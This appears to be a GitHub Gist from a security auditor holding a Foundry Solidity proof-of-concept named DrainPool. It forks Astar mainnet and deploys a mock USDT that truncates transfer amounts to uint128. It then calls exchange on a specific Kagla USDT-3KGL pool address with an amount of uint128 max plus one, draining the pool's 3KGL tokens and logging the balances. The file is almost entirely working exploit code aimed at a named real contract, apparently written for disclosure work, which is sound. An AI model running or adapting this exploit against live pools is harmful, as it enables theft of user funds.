-
-
Save zellic-audit/53430b9360f375f4cb9784073783a46e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: UNLICENSED | |
pragma solidity >0.8.20; | |
pragma experimental ABIEncoderV2; | |
import {Test} from "forge-std/Test.sol"; | |
import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol"; | |
import "forge-std/console.sol"; | |
interface IIPool { | |
function coins(uint) external view returns (address); | |
function exchange( | |
int128 i, | |
int128 j, | |
uint256 dx, | |
uint256 min_dy | |
) external returns (uint256); | |
} | |
contract USDT is ERC20 { | |
constructor() ERC20("Tether USD", "USDT") {} | |
function decimals() public pure override returns (uint8) { | |
return 6; | |
} | |
function transferFrom( | |
address sender, | |
address recipient, | |
uint256 amount | |
) public override returns (bool) { | |
uint128 a = uint128(amount); | |
return super.transferFrom(sender, recipient, uint256(a)); | |
} | |
function transfer( | |
address recipient, | |
uint256 amount | |
) public override returns (bool) { | |
uint128 a = uint128(amount); | |
return super.transfer(recipient, uint256(a)); | |
} | |
function mint(address recipient, uint256 amount) public { | |
_mint(recipient, amount); | |
} | |
} | |
contract DrainPool is Test { | |
USDT usdt; | |
IIPool kaglaPool = IIPool(0xDc1C5bAbB4dad3117Fd46d542f3b356D171417fA); | |
function setUp() public { | |
vm.createSelectFork( | |
"https://astar-mainnet.g.alchemy.com/v2/xxxxxxxx", | |
4822542 | |
); | |
deployCodeTo( | |
"DrainPool.t.sol:USDT", | |
"", | |
address(0xfFFfffFF000000000000000000000001000007C0) | |
); | |
usdt = USDT(0xfFFfffFF000000000000000000000001000007C0); | |
usdt.mint(address(kaglaPool), 267994933776); | |
} | |
function testDrainKagla() public { | |
ERC20 kgl3 = ERC20(kaglaPool.coins(1)); | |
console.log("Draining the Kagla USDT-3KGL pool"); | |
console.log("pool.coins(0): %s", kaglaPool.coins(0)); | |
console.log("pool.coins(1): %s", kaglaPool.coins(1)); | |
console.log( | |
"usdt.balanceOf(address(pool)) : %s", | |
usdt.balanceOf(address(kaglaPool)) | |
); | |
console.log( | |
"3kgl.balanceOf(address(pool)): %s", | |
kgl3.balanceOf(address(kaglaPool)) | |
); | |
console.log( | |
"3kgl.balanceOf(address(this)): %s", | |
kgl3.balanceOf(address(this)) | |
); | |
console.log("Draining pool now..."); | |
// def exchange(i: int128, j: int128, dx: uint256, min_dy: uint256) | |
uint256 truncatedAmount = uint256(type(uint128).max) + 1; | |
kaglaPool.exchange(0, 1, truncatedAmount, 0); | |
console.log( | |
"usdt.balanceOf(address(pool)) : %s", | |
usdt.balanceOf(address(kaglaPool)) | |
); | |
console.log( | |
"kgl3.balanceOf(address(pool)): %s", | |
kgl3.balanceOf(address(kaglaPool)) | |
); | |
console.log( | |
"3kgl.balanceOf(address(this)): %s", | |
kgl3.balanceOf(address(this)) | |
); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment